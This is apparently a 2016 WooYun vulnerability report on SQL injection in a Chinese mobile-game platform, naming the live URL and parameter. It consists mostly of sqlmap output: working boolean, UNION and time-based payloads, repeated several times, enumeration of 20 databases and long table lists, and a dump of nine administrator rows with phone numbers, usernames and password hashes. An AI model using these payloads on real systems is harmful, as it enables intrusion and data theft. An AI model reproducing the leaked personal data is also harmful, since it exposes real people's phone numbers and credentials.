漏洞概要 关注数(3) 关注此漏洞
缺陷编号: WooYun-2016-187115
漏洞标题: 天宇手游网络平台存在SQL注射,可泄漏20库信息。
相关厂商: 天宇手游网络平台
漏洞作者: 白骨夫人
提交时间: 2016-03-21 10:24
公开时间: 2016-05-05 10:24
漏洞类型: SQL注射漏洞
危害等级: 高
自评Rank: 20
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系
Tags标签: php+数字类型注射
漏洞详情
披露状态:
2016-03-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-05: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
某手游网络游戏平台存在SQL注射,可泄漏20库信息。
补天很坑的,不交补天了。
详细说明:
天宇手游网络平台存在SQL注射,可泄漏20库信息。
用了延时注入,只破了管理帐号邮箱密码信息,其他的你们懂的。
漏洞证明:
注入点:http://www.tysy8.com/e/game/list/wyk.php?classid=1
--delay 2 --time-sec 2 --timeout 10.5
---
Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=1 AND 1439=1439
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: classid=1 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7669743a,0x49
667a554e587a667664,0x3a71687a3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: classid=1 AND SLEEP(2)
---
[20:34:20] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0.11
back-end DBMS: MySQL 5.0.11
[20:37:02] [INFO] fetching database names
available databases [20]:
[*] bao
[*] bao2
[*] bao3
[*] baocms2
[*] baocms4
[*] business
[*] cz
[*] hf
[*] hp
[*] information_schema
[*] mysql
[*] o2o
[*] test
[*] tianyu
[*] tianyucms
[*] ty
[*] tysy8
[*] uc
[*] ym
[*] ym2
Database: tianyucms
[35 tables]
+-----------------------------+
| iforward_admin |
| iforward_admingroup |
| iforward_arcatt |
| iforward_archives |
| iforward_article |
| iforward_attachment |
| iforward_category |
| iforward_category_priv |
| iforward_comments |
| iforward_config |
| iforward_custom_nav |
| iforward_custompage |
| iforward_game_position |
| iforward_game_position_data |
| iforward_games |
| iforward_ka |
| iforward_kaice |
| iforward_kaifu |
| iforward_loginlog |
| iforward_member |
| iforward_member_config |
| iforward_member_detail |
| iforward_member_games |
| iforward_member_group |
| iforward_mobileuser |
| iforward_model |
| iforward_model_field |
| iforward_operationlog |
| iforward_position |
| iforward_position_data |
| iforward_tags |
| iforward_tags_content |
| iforward_taohao |
| iforward_test111 |
| iforward_urlrule |
+-----------------------------+
Database: tianyucms
Table: iforward_admin
[10 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| email | varchar(45) |
| id | int(11) |
| loginip | varchar(15) |
| logintime | datetime |
| nickname | varchar(45) |
| password | varchar(45) |
| phone | char(11) |
| realname | varchar(45) |
| username | varchar(45) |
| usertype | int(11) |
+-----------+-------------+
Database: tianyucms
Table: iforward_admin
[9 entries]
+-------------+-----------------------+------------+----------+-----------------
-----------------+
| phone | email | username | realname | password
|
+-------------+-----------------------+------------+----------+-----------------
-----------------+
| 18502707001 | | yuzuan | ?? | 294cfd87cee6be3a
bb8e92daad34e929 |
| 18510330778 | | czwecho | ??? | 93b265507fe29be0
ac8c5f06afc1ad68 |
| 13716194225 | | wanglibo | ??? | e83f9f453cd0b9ea
b304db271bf2c96a |
| 13683004209 | | guohonglin | ??? | 683f5b86a57ee114
794e1648adc48c4a |
| 13693362029 | | huangyue | ?? | 5ebdb85fddc9dd1a
8735954d314a3995 |
| 15200096951 | | baxiuying | ??? | fb057200570d09e4
1a62abada5fc132e |
| 13898944175 | | sunye | ?? | 2a39f0141e6fdfaa
2c51cc7bcc714063 |
| 18888888888 | | zhangchuan | ?? | e8c7ee5e75496d27
903033c7dc6a661a |
| 18812345678 | | jiangfeng | ?? | 5c630a0e76ddfc88
b22c9b22edc07822 |
+-------------+-----------------------+------------+----------+-----------------
-----------------+
Database: tianyucms
Table: iforward_member
[16 columns]
+-------------+----------------------+
| Column | Type |
+-------------+----------------------+
| checked | tinyint(1) |
| email | varchar(32) |
| groupid | tinyint(3) unsigned |
| lastdate | datetime |
| nickname | varchar(50) |
| overduedate | int(10) |
| password | varchar(50) |
| phone | varchar(20) |
| point | smallint(5) unsigned |
| regdate | datetime |
| regip | char(15) |
| uid | int(11) |
| userid | int(11) unsigned |
| username | varchar(20) |
| userpic | varchar(200) |
| vip | tinyint(1) |
+-------------+----------------------+
sqlmap identified the following injection points with a total of 33 HTTP(s) requests:
---
Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=1 AND 1439=1439
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: classid=1 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7669743a,0x49667a554e587a667664,0x3a71687a3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: classid=1 AND SLEEP(2)
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=1 AND 1439=1439
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: classid=1 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7669743a,0x49667a554e587a667664,0x3a71687a3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: classid=1 AND SLEEP(2)
---
available databases [20]:
[*] bao
[*] bao2
[*] bao3
[*] baocms2
[*] baocms4
[*] business
[*] cz
[*] hf
[*] hp
[*] information_schema
[*] mysql
[*] o2o
[*] test
[*] tianyu
[*] tianyucms
[*] ty
[*] tysy8
[*] uc
[*] ym
[*] ym2
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=1 AND 1439=1439
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: classid=1 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7669743a,0x49667a554e587a667664,0x3a71687a3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: classid=1 AND SLEEP(2)
---
current database: 'ty'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=1 AND 1439=1439
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: classid=1 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7669743a,0x49667a554e587a667664,0x3a71687a3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: classid=1 AND SLEEP(2)
---
current user: None
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=1 AND 1439=1439
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: classid=1 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7669743a,0x49667a554e587a667664,0x3a71687a3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: classid=1 AND SLEEP(2)
---
Database: ty
[601 tables]
+--------------------------------------------------+
| aws_active_data |
| aws_answer |
| aws_answer_comments |
| aws_answer_thanks |
| aws_answer_uninterested |
| aws_answer_vote |
| aws_approval |
| aws_article |
| aws_article_comments |
| aws_article_vote |
| aws_attach |
| aws_category |
| aws_draft |
| aws_edm_task |
| aws_edm_taskdata |
| aws_edm_unsubscription |
| aws_edm_userdata |
| aws_edm_usergroup |
| aws_education_experience |
| aws_favorite |
| aws_favorite_tag |
| aws_feature |
| aws_feature_topic |
| aws_geo_location |
| aws_help_chapter |
| aws_inbox |
| aws_inbox_dialog |
| aws_integral_log |
| aws_invitation |
| aws_jobs |
| aws_mail_queue |
| aws_nav_menu |
| aws_notification |
| aws_notification_data |
| aws_pages |
| aws_posts_index |
| aws_question |
| aws_question_comments |
| aws_question_focus |
| aws_question_invite |
| aws_question_thanks |
| aws_question_uninterested |
| aws_received_email |
| aws_receiving_email_config |
| aws_redirect |
| aws_related_links |
| aws_related_topic |
| aws_report |
| aws_reputation_category |
| aws_reputation_topic |
| aws_school |
| aws_search_cache |
| aws_sessions |
| aws_system_setting |
| aws_topic |
| aws_topic_focus |
| aws_topic_merge |
| aws_topic_relation |
| aws_user_action_history |
| aws_user_action_history_data |
| aws_user_action_history_fresh |
| aws_user_follow |
| aws_users |
| aws_users_attrib |
| aws_users_facebook |
| aws_users_google |
| aws_users_group |
| aws_users_notification_setting |
| aws_users_online |
| aws_users_qq |
| aws_users_sina |
| aws_users_twitter |
| aws_users_ucenter |
| aws_users_weixin |
| aws_verify_apply |
| aws_weibo_msg |
| aws_weixin_accounts |
| aws_weixin_login |
| aws_weixin_message |
| aws_weixin_msg |
| aws_weixin_qr_code |
| aws_weixin_reply_rule |
| aws_weixin_third_party_api |
| aws_work_experience |
| czdh |
| jfdh |
| ty_ecms_app |
| ty_ecms_app_check |
| ty_ecms_app_check_data |
| ty_ecms_app_data_1 |
| ty_ecms_app_doc |
| ty_ecms_app_doc_data |
| ty_ecms_app_doc_index |
| ty_ecms_app_index |
| ty_ecms_article |
| ty_ecms_article_check |
| ty_ecms_article_check_data |
| ty_ecms_article_data_1 |
| ty_ecms_article_doc |
| ty_ecms_article_doc_data |
| ty_ecms_article_doc_index |
| ty_ecms_article_index |
| ty_ecms_card |
| ty_ecms_card_check |
| ty_ecms_card_check_data |
| ty_ecms_card_data_1 |
| ty_ecms_card_doc |
| ty_ecms_card_doc_data |
| ty_ecms_card_doc_index |
| ty_ecms_card_index |
| ty_ecms_card_list |
| ty_ecms_download |
| ty_ecms_download_check |
| ty_ecms_download_check_data |
| ty_ecms_download_data_1 |
| ty_ecms_download_doc |
| ty_ecms_download_doc_data |
| ty_ecms_download_doc_index |
| ty_ecms_download_index |
| ty_ecms_flash |
| ty_ecms_flash_check |
| ty_ecms_flash_check_data |
| ty_ecms_flash_data_1 |
| ty_ecms_flash_doc |
| ty_ecms_flash_doc_data |
| ty_ecms_flash_doc_index |
| ty_ecms_flash_index |
| ty_ecms_info |
| ty_ecms_info_check |
| ty_ecms_info_check_data |
| ty_ecms_info_data_1 |
| ty_ecms_info_doc |
| ty_ecms_info_doc_data |
| ty_ecms_info_doc_index |
| ty_ecms_info_index |
| ty_ecms_infoclass_app |
| ty_ecms_infoclass_article |
| ty_ecms_infoclass_card |
| ty_ecms_infoclass_download |
| ty_ecms_infoclass_flash |
| ty_ecms_infoclass_info |
| ty_ecms_infoclass_jflp |
| ty_ecms_infoclass_movie |
| ty_ecms_infoclass_news |
| ty_ecms_infoclass_photo |
| ty_ecms_infoclass_shop |
| ty_ecms_infoclass_time |
| ty_ecms_infotmp_app |
| ty_ecms_infotmp_article |
| ty_ecms_infotmp_card |
| ty_ecms_infotmp_download |
| ty_ecms_infotmp_flash |
| ty_ecms_infotmp_info |
| ty_ecms_infotmp_jflp |
| ty_ecms_infotmp_movie |
| ty_ecms_infotmp_news |
| ty_ecms_infotmp_photo |
| ty_ecms_infotmp_shop |
| ty_ecms_infotmp_time |
| ty_ecms_jflp |
| ty_ecms_jflp_check |
| ty_ecms_jflp_check_data |
| ty_ecms_jflp_data_1 |
| ty_ecms_jflp_doc |
| ty_ecms_jflp_doc_data |
| ty_ecms_jflp_doc_index |
| ty_ecms_jflp_index |
| ty_ecms_movie |
| ty_ecms_movie_check |
| ty_ecms_movie_check_data |
| ty_ecms_movie_data_1 |
| ty_ecms_movie_doc |
| ty_ecms_movie_doc_data |
| ty_ecms_movie_doc_index |
| ty_ecms_movie_index |
| ty_ecms_news |
| ty_ecms_news_check |
| ty_ecms_news_check_data |
| ty_ecms_news_data_1 |
| ty_ecms_news_doc |
| ty_ecms_news_doc_data |
| ty_ecms_news_doc_index |
| ty_ecms_news_index |
| ty_ecms_photo |
| ty_ecms_photo_check |
| ty_ecms_photo_check_data |
| ty_ecms_photo_data_1 |
| ty_ecms_photo_doc |
| ty_ecms_photo_doc_data |
| ty_ecms_photo_doc_index |
| ty_ecms_photo_index |
| ty_ecms_shop |
| ty_ecms_shop_check |
| ty_ecms_shop_check_data |
| ty_ecms_shop_data_1 |
| ty_ecms_shop_doc |
| ty_ecms_shop_doc_data |
| ty_ecms_shop_doc_index |
| ty_ecms_shop_index |
| ty_ecms_time |
| ty_ecms_time_check |
| ty_ecms_time_check_data |
| ty_ecms_time_data_1 |
| ty_ecms_time_doc |
| ty_ecms_time_doc_data |
| ty_ecms_time_doc_index |
| ty_ecms_time_index |
| ty_enewsad |
| ty_enewsadclass |
| ty_enewsadminstyle |
| ty_enewsbefrom |
| ty_enewsbooking |
| ty_enewsbq |
| ty_enewsbqclass |
| ty_enewsbqtemp |
| ty_enewsbqtempclass |
| ty_enewsbuybak |
| ty_enewsbuygroup |
| ty_enewscard |
| ty_enewsclass |
| ty_enewsclass_stats |
| ty_enewsclass_stats_ip |
| ty_enewsclass_stats_set |
| ty_enewsclassadd |
| ty_enewsclassf |
| ty_enewsclassnavcache |
| ty_enewsclasstemp |
| ty_enewsclasstempclass |
| ty_enewsdiggips |
| ty_enewsdo |
| ty_enewsdolog |
| ty_enewsdownerror |
| ty_enewsdownrecord |
| ty_enewsdownurlqz |
| ty_enewserrorclass |
| ty_enewsf |
| ty_enewsfava |
| ty_enewsfavaclass |
| ty_enewsfeedback |
| ty_enewsfeedbackclass |
| ty_enewsfeedbackf |
| ty_enewsfile_1 |
| ty_enewsfile_member |
| ty_enewsfile_other |
| ty_enewsfile_public |
| ty_enewsgbook |
| ty_enewsgbookclass |
| ty_enewsgfenip |
| ty_enewsgroup |
| ty_enewshmsg |
| ty_enewshnotice |
| ty_enewshy |
| ty_enewshyclass |
| ty_enewsindexpage |
| ty_enewsinfoclass |
| ty_enewsinfotype |
| ty_enewsinfovote |
| ty_enewsjstemp |
| ty_enewsjstempclass |
| ty_enewskey |
| ty_enewskeyclass |
| ty_enewslink |
| ty_enewslinkclass |
| ty_enewslinktmp |
| ty_enewslisttemp |
| ty_enewslisttempclass |
| ty_enewslog |
| ty_enewsloginfail |
| ty_enewsmember |
| ty_enewsmember_connect |
| ty_enewsmember_connect_app |
| ty_enewsmemberadd |
| ty_enewsmemberf |
| ty_enewsmemberfeedback |
| ty_enewsmemberform |
| ty_enewsmembergbook |
| ty_enewsmembergroup |
| ty_enewsmemberpub |
| ty_enewsmenu |
| ty_enewsmenuclass |
| ty_enewsmod |
| ty_enewsnewstemp |
| ty_enewsnewstempclass |
| ty_enewsnotcj |
| ty_enewsnotice |
| ty_enewspage |
| ty_enewspageclass |
| ty_enewspagetemp |
| ty_enewspayapi |
| ty_enewspayrecord |
| ty_enewspic |
| ty_enewspicclass |
| ty_enewspl_1 |
| ty_enewspl_set |
| ty_enewsplayer |
| ty_enewsplf |
| ty_enewspltemp |
| ty_enewspostdata |
| ty_enewspostserver |
| ty_enewsprinttemp |
| ty_enewspublic |
| ty_enewspublic_update |
| ty_enewspubtemp |
| ty_enewspubvar |
| ty_enewspubvarclass |
| ty_enewsqmsg |
| ty_enewssearch |
| ty_enewssearchall |
| ty_enewssearchall_load |
| ty_enewssearchtemp |
| ty_enewssearchtempclass |
| ty_enewsshop_address |
| ty_enewsshop_ddlog |
| ty_enewsshop_precode |
| ty_enewsshop_set |
| ty_enewsshopdd |
| ty_enewsshopdd_add |
| ty_enewsshoppayfs |
| ty_enewsshopps |
| ty_enewssp |
| ty_enewssp_1 |
| ty_enewssp_2 |
| ty_enewssp_3 |
| ty_enewssp_3_bak |
| ty_enewsspacestyle |
| ty_enewsspclass |
| ty_enewssql |
| ty_enewstable |
| ty_enewstags |
| ty_enewstagsclass |
| ty_enewstagsdata |
| ty_enewstask |
| ty_enewstempbak |
| ty_enewstempdt |
| ty_enewstempgroup |
| ty_enewstempvar |
| ty_enewstempvarclass |
| ty_enewstogzts |
| ty_enewsuser |
| ty_enewsuseradd |
| ty_enewsuserclass |
| ty_enewsuserjs |
| ty_enewsuserjsclass |
| ty_enewsuserlist |
| ty_enewsuserlistclass |
| ty_enewsuserloginck |
| ty_enewsvote |
| ty_enewsvotemod |
| ty_enewsvotetemp |
| ty_enewswapstyle |
| ty_enewswfinfo |
| ty_enewswfinfolog |
| ty_enewswords |
| ty_enewsworkflow |
| ty_enewsworkflowitem |
| ty_enewswriter |
| ty_enewsyh |
| ty_enewszt |
| ty_enewsztadd |
| ty_enewsztclass |
| ty_enewsztf |
| ty_enewsztinfo |
| ty_enewszttype |
| ty_enewszttypeadd |
| www_92game_net_ikanchai_ecms_article |
| www_92game_net_ikanchai_ecms_article_check |
| www_92game_net_ikanchai_ecms_article_check_data |
| www_92game_net_ikanchai_ecms_article_data_1 |
| www_92game_net_ikanchai_ecms_article_doc |
| www_92game_net_ikanchai_ecms_article_doc_data |
| www_92game_net_ikanchai_ecms_article_doc_index |
| www_92game_net_ikanchai_ecms_article_index |
| www_92game_net_ikanchai_ecms_download |
| www_92game_net_ikanchai_ecms_download_check |
| www_92game_net_ikanchai_ecms_download_check_data |
| www_92game_net_ikanchai_ecms_download_data_1 |
| www_92game_net_ikanchai_ecms_download_doc |
| www_92game_net_ikanchai_ecms_download_doc_data |
| www_92game_net_ikanchai_ecms_download_doc_index |
| www_92game_net_ikanchai_ecms_download_index |
| www_92game_net_ikanchai_ecms_flash |
| www_92game_net_ikanchai_ecms_flash_check |
| www_92game_net_ikanchai_ecms_flash_check_data |
| www_92game_net_ikanchai_ecms_flash_data_1 |
| www_92game_net_ikanchai_ecms_flash_doc |
| www_92game_net_ikanchai_ecms_flash_doc_data |
| www_92game_net_ikanchai_ecms_flash_doc_index |
| www_92game_net_ikanchai_ecms_flash_index |
| www_92game_net_ikanchai_ecms_info |
| www_92game_net_ikanchai_ecms_info_check |
| www_92game_net_ikanchai_ecms_info_check_data |
| www_92game_net_ikanchai_ecms_info_data_1 |
| www_92game_net_ikanchai_ecms_info_doc |
| www_92game_net_ikanchai_ecms_info_doc_data |
| www_92game_net_ikanchai_ecms_info_doc_index |
| www_92game_net_ikanchai_ecms_info_index |
| www_92game_net_ikanchai_ecms_infoclass_article |
| www_92game_net_ikanchai_ecms_infoclass_download |
| www_92game_net_ikanchai_ecms_infoclass_flash |
| www_92game_net_ikanchai_ecms_infoclass_info |
| www_92game_net_ikanchai_ecms_infoclass_movie |
| www_92game_net_ikanchai_ecms_infoclass_news |
| www_92game_net_ikanchai_ecms_infoclass_photo |
| www_92game_net_ikanchai_ecms_infoclass_shop |
| www_92game_net_ikanchai_ecms_infotmp_article |
| www_92game_net_ikanchai_ecms_infotmp_download |
| www_92game_net_ikanchai_ecms_infotmp_flash |
| www_92game_net_ikanchai_ecms_infotmp_info |
| www_92game_net_ikanchai_ecms_infotmp_movie |
| www_92game_net_ikanchai_ecms_infotmp_news |
| www_92game_net_ikanchai_ecms_infotmp_photo |
| www_92game_net_ikanchai_ecms_infotmp_shop |
| www_92game_net_ikanchai_ecms_movie |
| www_92game_net_ikanchai_ecms_movie_check |
| www_92game_net_ikanchai_ecms_movie_check_data |
| www_92game_net_ikanchai_ecms_movie_data_1 |
| www_92game_net_ikanchai_ecms_movie_doc |
| www_92game_net_ikanchai_ecms_movie_doc_data |
| www_92game_net_ikanchai_ecms_movie_doc_index |
| www_92game_net_ikanchai_ecms_movie_index |
| www_92game_net_ikanchai_ecms_news |
| www_92game_net_ikanchai_ecms_news_check |
| www_92game_net_ikanchai_ecms_news_check_data |
| www_92game_net_ikanchai_ecms_news_data_1 |
| www_92game_net_ikanchai_ecms_news_doc |
| www_92game_net_ikanchai_ecms_news_doc_data |
| www_92game_net_ikanchai_ecms_news_doc_index |
| www_92game_net_ikanchai_ecms_news_index |
| www_92game_net_ikanchai_ecms_photo |
| www_92game_net_ikanchai_ecms_photo_check |
| www_92game_net_ikanchai_ecms_photo_check_data |
| www_92game_net_ikanchai_ecms_photo_data_1 |
| www_92game_net_ikanchai_ecms_photo_doc |
| www_92game_net_ikanchai_ecms_photo_doc_data |
| www_92game_net_ikanchai_ecms_photo_doc_index |
| www_92game_net_ikanchai_ecms_photo_index |
| www_92game_net_ikanchai_ecms_shop |
| www_92game_net_ikanchai_ecms_shop_check |
| www_92game_net_ikanchai_ecms_shop_check_data |
| www_92game_net_ikanchai_ecms_shop_data_1 |
| www_92game_net_ikanchai_ecms_shop_doc |
| www_92game_net_ikanchai_ecms_shop_doc_data |
| www_92game_net_ikanchai_ecms_shop_doc_index |
| www_92game_net_ikanchai_ecms_shop_index |
| www_92game_net_ikanchai_enewsad |
| www_92game_net_ikanchai_enewsadclass |
| www_92game_net_ikanchai_enewsadminstyle |
| www_92game_net_ikanchai_enewsbefrom |
| www_92game_net_ikanchai_enewsbq |
| www_92game_net_ikanchai_enewsbqclass |
| www_92game_net_ikanchai_enewsbqtemp |
| www_92game_net_ikanchai_enewsbqtempclass |
| www_92game_net_ikanchai_enewsbuybak |
| www_92game_net_ikanchai_enewsbuygroup |
| www_92game_net_ikanchai_enewscard |
| www_92game_net_ikanchai_enewsclass |
| www_92game_net_ikanchai_enewsclass_stats |
| www_92game_net_ikanchai_enewsclass_stats_ip |
| www_92game_net_ikanchai_enewsclass_stats_set |
| www_92game_net_ikanchai_enewsclassadd |
| www_92game_net_ikanchai_enewsclassf |
| www_92game_net_ikanchai_enewsclassnavcache |
| www_92game_net_ikanchai_enewsclasstemp |
| www_92game_net_ikanchai_enewsclasstempclass |
| www_92game_net_ikanchai_enewsdiggips |
| www_92game_net_ikanchai_enewsdo |
| www_92game_net_ikanchai_enewsdolog |
| www_92game_net_ikanchai_enewsdownerror |
| www_92game_net_ikanchai_enewsdownrecord |
| www_92game_net_ikanchai_enewsdownurlqz |
| www_92game_net_ikanchai_enewserrorclass |
| www_92game_net_ikanchai_enewsf |
| www_92game_net_ikanchai_enewsfava |
| www_92game_net_ikanchai_enewsfavaclass |
| www_92game_net_ikanchai_enewsfeedback |
| www_92game_net_ikanchai_enewsfeedbackclass |
| www_92game_net_ikanchai_enewsfeedbackf |
| www_92game_net_ikanchai_enewsfile_1 |
| www_92game_net_ikanchai_enewsfile_member |
| www_92game_net_ikanchai_enewsfile_other |
| www_92game_net_ikanchai_enewsfile_public |
| www_92game_net_ikanchai_enewsgbook |
| www_92game_net_ikanchai_enewsgbookclass |
| www_92game_net_ikanchai_enewsgfenip |
| www_92game_net_ikanchai_enewsgroup |
| www_92game_net_ikanchai_enewshmsg |
| www_92game_net_ikanchai_enewshnotice |
| www_92game_net_ikanchai_enewshy |
| www_92game_net_ikanchai_enewshyclass |
| www_92game_net_ikanchai_enewsindexpage |
| www_92game_net_ikanchai_enewsinfoclass |
| www_92game_net_ikanchai_enewsinfotype |
| www_92game_net_ikanchai_enewsinfovote |
| www_92game_net_ikanchai_enewsjstemp |
| www_92game_net_ikanchai_enewsjstempclass |
| www_92game_net_ikanchai_enewskey |
| www_92game_net_ikanchai_enewskeyclass |
| www_92game_net_ikanchai_enewslink |
| www_92game_net_ikanchai_enewslinkclass |
| www_92game_net_ikanchai_enewslinktmp |
| www_92game_net_ikanchai_enewslisttemp |
| www_92game_net_ikanchai_enewslisttempclass |
| www_92game_net_ikanchai_enewslog |
| www_92game_net_ikanchai_enewsloginfail |
| www_92game_net_ikanchai_enewsmember |
| www_92game_net_ikanchai_enewsmember_connect |
| www_92game_net_ikanchai_enewsmember_connect_app |
| www_92game_net_ikanchai_enewsmemberadd |
| www_92game_net_ikanchai_enewsmemberf |
| www_92game_net_ikanchai_enewsmemberfeedback |
| www_92game_net_ikanchai_enewsmemberform |
| www_92game_net_ikanchai_enewsmembergbook |
| www_92game_net_ikanchai_enewsmembergroup |
| www_92game_net_ikanchai_enewsmemberpub |
| www_92game_net_ikanchai_enewsmenu |
| www_92game_net_ikanchai_enewsmenuclass |
| www_92game_net_ikanchai_enewsmod |
| www_92game_net_ikanchai_enewsmoreport |
| www_92game_net_ikanchai_enewsnewstemp |
| www_92game_net_ikanchai_enewsnewstempclass |
| www_92game_net_ikanchai_enewsnotcj |
| www_92game_net_ikanchai_enewsnotice |
| www_92game_net_ikanchai_enewspage |
| www_92game_net_ikanchai_enewspageclass |
| www_92game_net_ikanchai_enewspagetemp |
| www_92game_net_ikanchai_enewspayapi |
| www_92game_net_ikanchai_enewspayrecord |
| www_92game_net_ikanchai_enewspic |
| www_92game_net_ikanchai_enewspicclass |
| www_92game_net_ikanchai_enewspl_1 |
| www_92game_net_ikanchai_enewspl_set |
| www_92game_net_ikanchai_enewsplayer |
| www_92game_net_ikanchai_enewsplf |
| www_92game_net_ikanchai_enewspltemp |
| www_92game_net_ikanchai_enewspostdata |
| www_92game_net_ikanchai_enewspostserver |
| www_92game_net_ikanchai_enewsprinttemp |
| www_92game_net_ikanchai_enewspublic |
| www_92game_net_ikanchai_enewspublic_update |
| www_92game_net_ikanchai_enewspubtemp |
| www_92game_net_ikanchai_enewspubvar |
| www_92game_net_ikanchai_enewspubvarclass |
| www_92game_net_ikanchai_enewsqmsg |
| www_92game_net_ikanchai_enewssearch |
| www_92game_net_ikanchai_enewssearchall |
| www_92game_net_ikanchai_enewssearchall_load |
| www_92game_net_ikanchai_enewssearchtemp |
| www_92game_net_ikanchai_enewssearchtempclass |
| www_92game_net_ikanchai_enewsshop_address |
| www_92game_net_ikanchai_enewsshop_ddlog |
| www_92game_net_ikanchai_enewsshop_precode |
| www_92game_net_ikanchai_enewsshop_set |
| www_92game_net_ikanchai_enewsshopdd |
| www_92game_net_ikanchai_enewsshopdd_add |
| www_92game_net_ikanchai_enewsshoppayfs |
| www_92game_net_ikanchai_enewsshopps |
| www_92game_net_ikanchai_enewssp |
| www_92game_net_ikanchai_enewssp_1 |
| www_92game_net_ikanchai_enewssp_2 |
| www_92game_net_ikanchai_enewssp_3 |
| www_92game_net_ikanchai_enewssp_3_bak |
| www_92game_net_ikanchai_enewsspacestyle |
| www_92game_net_ikanchai_enewsspclass |
| www_92game_net_ikanchai_enewssql |
| www_92game_net_ikanchai_enewstable |
| www_92game_net_ikanchai_enewstags |
| www_92game_net_ikanchai_enewstagsclass |
| www_92game_net_ikanchai_enewstagsdata |
| www_92game_net_ikanchai_enewstask |
| www_92game_net_ikanchai_enewstempbak |
| www_92game_net_ikanchai_enewstempdt |
| www_92game_net_ikanchai_enewstempgroup |
| www_92game_net_ikanchai_enewstempvar |
| www_92game_net_ikanchai_enewstempvarclass |
| www_92game_net_ikanchai_enewstogzts |
| www_92game_net_ikanchai_enewsuser |
| www_92game_net_ikanchai_enewsuseradd |
| www_92game_net_ikanchai_enewsuserclass |
| www_92game_net_ikanchai_enewsuserjs |
| www_92game_net_ikanchai_enewsuserjsclass |
| www_92game_net_ikanchai_enewsuserlist |
| www_92game_net_ikanchai_enewsuserlistclass |
| www_92game_net_ikanchai_enewsuserloginck |
| www_92game_net_ikanchai_enewsvote |
| www_92game_net_ikanchai_enewsvotemod |
| www_92game_net_ikanchai_enewsvotetemp |
| www_92game_net_ikanchai_enewswapstyle |
| www_92game_net_ikanchai_enewswfinfo |
| www_92game_net_ikanchai_enewswfinfolog |
| www_92game_net_ikanchai_enewswords |
| www_92game_net_ikanchai_enewsworkflow |
| www_92game_net_ikanchai_enewsworkflowitem |
| www_92game_net_ikanchai_enewswriter |
| www_92game_net_ikanchai_enewsyh |
| www_92game_net_ikanchai_enewszt |
| www_92game_net_ikanchai_enewsztadd |
| www_92game_net_ikanchai_enewsztclass |
| www_92game_net_ikanchai_enewsztf |
| www_92game_net_ikanchai_enewsztinfo |
| www_92game_net_ikanchai_enewszttype |
| www_92game_net_ikanchai_enewszttypeadd |
+--------------------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=1 AND 1439=1439
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: classid=1 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7669743a,0x49667a554e587a667664,0x3a71687a3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: classid=1 AND SLEEP(2)
---
Database: tianyu
[598 tables]
+----------------------------------+
| ty_common_admincp_cmenu |
| ty_common_admincp_group |
| ty_common_admincp_member |
| ty_common_admincp_perm |
| ty_common_admincp_session |
| ty_common_admingroup |
| ty_common_adminnote |
| ty_common_advertisement |
| ty_common_advertisement_custom |
| ty_common_banned |
| ty_common_block |
| ty_common_block_favorite |
| ty_common_block_item |
| ty_common_block_item_data |
| ty_common_block_permission |
| ty_common_block_pic |
| ty_common_block_style |
| ty_common_block_xml |
| ty_common_cache |
| ty_common_card |
| ty_common_card_log |
| ty_common_card_type |
| ty_common_connect_guest |
| ty_common_credit_log |
| ty_common_credit_log_field |
| ty_common_credit_rule |
| ty_common_credit_rule_log |
| ty_common_credit_rule_log_field |
| ty_common_cron |
| ty_common_devicetoken |
